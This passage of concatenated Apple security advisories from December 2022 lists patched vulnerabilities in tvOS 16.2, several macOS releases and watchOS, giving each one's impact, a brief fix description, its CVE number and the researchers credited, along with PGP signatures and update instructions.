Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

libxml2  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

Safari  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: A spoofing issue existed in the handling of URLs. This  
issue was addressed with improved input validation.  
CVE-2022-46695: KirtiKumar Anandrao Ramchandani

Software Update  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to elevate privileges  
Description: An access issue existed with privileged API calls. This  
issue was addressed with additional restrictions.  
CVE-2022-42849: Mickey Jin (@patch1t)

Weather  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-42866: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

Additional recognition

Kernel  
We would like to acknowledge Zweig of Kunlun Lab for their  
assistance.

Safari Extensions  
We would like to acknowledge Oliver Dunk and Christian R. of  
1Password for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher and scarlet for  
their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke  
NxlyKA//eeU/txeqNxHM7JQE6xFrlla1tinQYMjbLhMgzdTbKpPjX8aHVqFfLB/Q  
5nH+NqrGs4HQwNQJ6fSiBIId0th71mgX7W3Noa1apzFh7Okl6IehczkAFB9OH7ve  
vnwiEECGU0hUNmbIi0s9HuuBo6eSNPFsJt0Jqn8ovV+F9bc+ftl/IRv6q2vg3rl3  
DNag62BCmCN4uXmqoJ4CKg7cNbddvma0bDbB1yYujxdmFwm4JGN6aittXE3WtPK2  
GH2/UxdZll8FR7Zegh1ziUcTaLR4dwHlXRFgc6WC8hqx6T8imNh1heAPwzhT+Iag  
piObDoMs7UYFKF/eQ8LUcl4hX8IOdLFO5I+BcvCzOcKqHutPqbE8QRU9yqjcQlsJ  
sOV7GT9W9J+QhibpIJbLVkkQp5djPZ8mLP0OKiRN1quEDWMrquPdM+r9ftJwEIki  
PLL/ur9c7geXCJCLzglMSMkNcoGZk77qzfJuPdoE0lD6zjdvBHalF5j8S0a1+9gi  
ex3zU1I+ixqg7CvLNfkSjLcO9KOoPEFHnqEFrrO17QWWyraugrPgV0dMYArGRBpA  
FofYP6bXLv8eSUNuyOoQxF6kS4ChYgLUabl2NYqop9LoRWAtDAclTiabuvDJPfqA  
W09wxdhbpp2saxt8LlQjffzOmHJST6oHhHZiFiFswRM0q0nue6I=  
=DltD  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-8

Apple Security Advisory 2022-12-13-7 - tvOS 16.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-7 tvOS 16.2

tvOS 16.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213535.

Accounts  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved data protection.  
CVE-2022-42843: Mickey Jin (@patch1t)

AppleAVD  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Parsing a maliciously crafted video file may lead to kernel  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46694: Andrey Labunets and Nikita Tarakanov

AppleMobileFileIntegrity  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing

AVEVideoEncoder  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A logic issue was addressed with improved checks.  
CVE-2022-42848: ABC Research s.r.o

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing a maliciously crafted file may lead to arbitrary  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46693: Mickey Jin (@patch1t)

ImageIO  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Parsing a maliciously crafted TIFF file may lead to  
disclosure of user information  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42851: Mickey Jin (@patch1t)

IOHIDFamily  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

IOMobileFrameBuffer  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46690: John Aakerblom (@jaakerblom)

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Connecting to a malicious NFS server may lead to arbitrary  
code execution with kernel privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-46701: Felix Poulin-Belanger

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

Preferences  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to use arbitrary entitlements  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-42855: Ivan Fratric of Google Project Zero

Safari  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: A spoofing issue existed in the handling of URLs. This  
issue was addressed with improved input validation.  
CVE-2022-46695: KirtiKumar Anandrao Ramchandani

Software Update  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: A user may be able to elevate privileges  
Description: An access issue existed with privileged API calls. This  
issue was addressed with additional restrictions.  
CVE-2022-42849: Mickey Jin (@patch1t)

Weather  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-42866: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

WebKit  
Available for: Apple TV 4K, Apple TV 4K (2nd generation and later),  
and Apple TV HD  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited against versions of iOS released  
before iOS 15.1.  
Description: A type confusion issue was addressed with improved state  
handling.  
WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

Additional recognition

Kernel  
We would like to acknowledge Zweig of Kunlun Lab for their  
assistance.

Safari Extensions  
We would like to acknowledge Oliver Dunk and Christian R. of  
1Password for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher and scarlet for  
their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke  
NxkItA/+LIwJ66Odl7Uwp1N/qek5Z/TBuPKlbgTwRZGT3LBVMVmyHTBzebA88aNq  
Pae1RKQ2Txw4w9Tb7a08eeqRQD51MBoSjTxf23tO1o0B1UR3Hgq3gsOSjh/dTq9V  
Jvy4DpO15xdVHP3BH/li114JpgR+FoD5Du0rPffL01p6YtqeWMSvnRoCmwNcIqou  
i2ZObfdrL2WJ+IiDIlMoJ3v+B1tDxOWR6Mn37iRdzl+QgrQMQtP9pSsiAPCntA+y  
eFM5Hp0JlOMtCfA+xT+LRoZHCbjTCFMRlRbNffGvrNwwdTY4MXrSYlKcIo3yFT2m  
KSHrQNvqzWhmSLAcHlUNo0lVvtPAlrgyilCYaeRNgRC1+x8KRf/AcErXr23oKknJ  
lzIF6eVk1K3mxUmR+M+P8+cr14pbrUwJcQlm0In6/8fUulHtcElLE3fJ+HJVImx8  
RtvNmuCng5iEK1zlwgDvAKO3EgMrMtduF8aygaCcBmt65GMkHwvOGCDXcIrKfH9U  
sP4eY7V3t4CQd9TX3Vlmt47MwRTSVuUtMcQeQPhEUTdUbM7UlvtW8igrLvkz9uPn  
CpuE2mzhd/dJANXvMFBR9A0ilAdJO1QD/uSWL+UbKq4BlyiW5etd8gObQfHqqW3C  
sh0EwxLh4ATicRS9btAJMwIfK/ulYDWp4yuIsUamDj/sN9xWvXY=  
=i2O9  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-7

Apple Security Advisory 2022-12-13-6 - macOS Big Sur 11.7.2 addresses bypass, code execution, and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-6 macOS Big Sur 11.7.2

macOS Big Sur 11.7.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213534.

BOM  
Available for: macOS Big Sur  
Impact: An app may bypass Gatekeeper checks  
Description: A logic issue was addressed with improved checks.  
CVE-2022-42821: Jonathan Bar Or of Microsoft

DriverKit  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de)

IOHIDFamily  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

Kernel  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: macOS Big Sur  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

Kernel  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

libxml2  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: macOS Big Sur  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

ppp  
Available for: macOS Big Sur  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42840: an anonymous researcher

xar  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted package may lead to  
arbitrary code execution  
Description: A type confusion issue was addressed with improved  
checks.  
CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7

macOS Big Sur 11.7.2 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX8ACgkQ4RjMIDke  
NxkRHhAAks97Igh9fqeJEOOZuhjhTyUVSE7EVIDdqHx/YUX7BHIWbloEPHRFkkVH  
Sk1b94874939VVbt4yBnECvPhuCctdtejYapZRiIJhmNTcFUUXhXeBDUU8Gf5dG5  
80fRmuFL18HSKpNQSnC6ExO+6a1J5l+B9ifLWgqi18YkbyCkqwsdob6q0IpIgs2G  
JzqvhfNAjF9fdDIui8rbIBqXM/Ak/N09k4QIqEMkyMIAucIh5YebKNgBSP5jH/tF  
dXIcZb4TKV0KblQRLSCvvHYDYmNB6A1uVeoTgsvWg6x3DQTNLN7sq6CJX4llInJP  
g3eZA6vv5LkxOm18RqgbyzknyMWkhfrJKf304oHNym47qw4pGBDvC6AQwZDFOdTw  
60fDz+8weKRKNVCSEUAOEePrHcqV/9VdyNbnyxYDYr7DlVS4h4Yls+VD3Fn1pmkF  
f2+9CEGJe3cyzm7HO1pM8+seTvnYGPkSugaaEBxeUA1t3Q8alQEIgR4gXJwUqjKw  
vUVfdwVRN8S/UJ9XiAg93EKbi/kwSZ9RC4F8EPVsal/tKMMmawJDzHCJgA8ZyzGZ  
ODXpLQPPOs112BuyrtjLbMTQe7ZL+HKH4i1dwUqEbPYLsioBPqdKkwHynXXZpMGc  
6vwn45KYrP3A98IH8U8rngxinRtRFZiwcF7/gZdYlty+wg+bl4k=  
=OFIf  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-6

Apple Security Advisory 2022-12-13-5 - macOS Monterey 12.6.2 addresses bypass, code execution, and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-5 macOS Monterey 12.6.2

macOS Monterey 12.6.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213533.

Bluetooth  
Available for: macOS Monterey  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42854: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

BOM  
Available for: macOS Monterey  
Impact: An app may bypass Gatekeeper checks  
Description: A logic issue was addressed with improved checks.  
CVE-2022-42821: Jonathan Bar Or of Microsoft

DriverKit  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de)

File System  
Available for: macOS Monterey  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with improved checks.  
CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

IOHIDFamily  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

Kernel  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: macOS Monterey  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

Kernel  
Available for: macOS Monterey  
Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

libxml2  
Available for: macOS Monterey  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An integer overflow was addressed through improved input  
validation.  
CVE-2022-40303: Maddie Stone of Google Project Zero

libxml2  
Available for: macOS Monterey  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project  
Zero

ppp  
Available for: macOS Monterey  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42840: an anonymous researcher

Preferences  
Available for: macOS Monterey  
Impact: An app may be able to use arbitrary entitlements  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-42855: Ivan Fratric of Google Project Zero

xar  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted package may lead to  
arbitrary code execution  
Description: A type confusion issue was addressed with improved  
checks.  
CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7

macOS Monterey 12.6.2 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX8ACgkQ4RjMIDke  
NxmuDw/7B+dpr+R5V7L8iLPTeaWmYdo95V9eKbSoUaNMWy+zqAMTpjpybr8t04KE  
SlKg1LGUBtE0Yu+Hk8XH5w9cp9EmthJlViaQj/ARhQnaJAb6d4c7fVE/b70aFlB2  
LyGSwW7J2U7jJVT/DLNJRLPy57hql9hCONY0qZzGvF7cogjeyy3CKQx6JQoRcxP+  
BkwSgXX1BxscWkjtQkNnDEDJYWj04MxmTj+EVeoOmkDlXcSypYCBEAKz7474Hnql  
/lZYe8a+SupwOrXnJUusobAK8fUDN7tfmrr5Zg6F7mBGe6BDNX7E6BZ3hb8NH/sz  
w0BBUU4aLCAVFbgllNLGQqsWif4/julEaSneEtStrJDgNWaXbrhrTWAYzMfJIGoF  
nGWYmWUY8YR53zeC1egMvHoHnLFzIXGOWmKdWhahSMygHb1R5i8wdCcv+M1iL3BB  
pthnd3XnZiOcEo4Z2XazFJV2YQ6juDPcXFgS0fBsNBS7LvMKBia/ax3CGwAxEagM  
yLOgcgIIbdg6DM72siMOpfScB7EPcFIBb1H6IHBZMhRg0NRKMTB9tNE0rgQ+OYUN  
Ze1wkPo8FH1lCunDcSZ1v6JzGZRN/o3woaR3LHVYEPWe3zJY2YvaqRrD/QfjqsMm  
5o/94MyoeFn0WM6lXhqlBZvn8HtYDmFNu4VFt6ZjiL13CohaL2U=  
=U7h6  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-12-13-5

Apple Security Advisory 2022-12-13-4 - macOS Ventura 13.1 addresses bypass, code execution, out of bounds access, out of bounds write, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-12-13-4 macOS Ventura 13.1

macOS Ventura 13.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213532.

Accounts  
Available for: macOS Ventura  
Impact: A user may be able to view sensitive user information  
Description: This issue was addressed with improved data protection.  
CVE-2022-42843: Mickey Jin (@patch1t)

AMD  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-42847: ABC Research s.r.o.

AppleMobileFileIntegrity  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by enabling hardened runtime.  
CVE-2022-42865: Wojciech Reguła (@_r3ggi) of SecuRing

Bluetooth  
Available for: macOS Ventura  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42854: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte.  
Ltd. (@starlabs_sg)

Boot Camp  
Available for: macOS Ventura  
Impact: An app may be able to modify protected parts of the file  
system  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2022-42853: Mickey Jin (@patch1t) of Trend Micro

CoreServices  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: Multiple issues were addressed by removing the  
vulnerable code.  
CVE-2022-42859: Mickey Jin (@patch1t), Csaba Fitzl (@theevilbit) of  
Offensive Security

DriverKit  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-32942: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted file may lead to arbitrary  
code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46693: Mickey Jin (@patch1t)

IOHIDFamily  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-42864: Tommy Muir (@Muirey03)

IOMobileFrameBuffer  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-46690: John Aakerblom (@jaakerblom)

IOMobileFrameBuffer  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-46697: John Aakerblom (@jaakerblom) and Antonio Zekic  
(@antoniozekic)

iTunes Store  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: An issue existed in the parsing of URLs. This issue was  
addressed with improved input validation.  
CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A race condition was addressed with additional  
validation.  
CVE-2022-46689: Ian Beer of Google Project Zero

Kernel  
Available for: macOS Ventura  
Impact: Connecting to a malicious NFS server may lead to arbitrary  
code execution with kernel privileges  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-46701: Felix Poulin-Belanger

Kernel  
Available for: macOS Ventura  
Impact: A remote user may be able to cause kernel code execution  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: macOS Ventura  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed with improved checks.  
CVE-2022-42861: pattern-f (@pattern_F_) of Ant Security Light-Year  
Lab

Kernel  
Available for: macOS Ventura  
Impact: An app with root privileges may be able to execute arbitrary  
code with kernel privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42845: Adam Doupé of ASU SEFCOM

Photos  
Available for: macOS Ventura  
Impact: Shake-to-undo may allow a deleted photo to be re-surfaced  
without authentication  
Description: The issue was addressed with improved bounds checks.  
CVE-2022-32943: an anonymous researcher

ppp  
Available for: macOS Ventura  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42840: an anonymous researcher

Preferences  
Available for: macOS Ventura  
Impact: An app may be able to use arbitrary entitlements  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-42855: Ivan Fratric of Google Project Zero

Printing  
Available for: macOS Ventura  
Impact: An app may be able to bypass Privacy preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-42862: Mickey Jin (@patch1t)

Ruby  
Available for: macOS Ventura  
Impact: A remote user may be able to cause unexpected app termination  
or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-24836  
CVE-2022-29181

Safari  
Available for: macOS Ventura  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: A spoofing issue existed in the handling of URLs. This  
issue was addressed with improved input validation.  
CVE-2022-46695: KirtiKumar Anandrao Ramchandani

Weather  
Available for: macOS Ventura  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of  
caches.  
CVE-2022-42866: an anonymous researcher

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
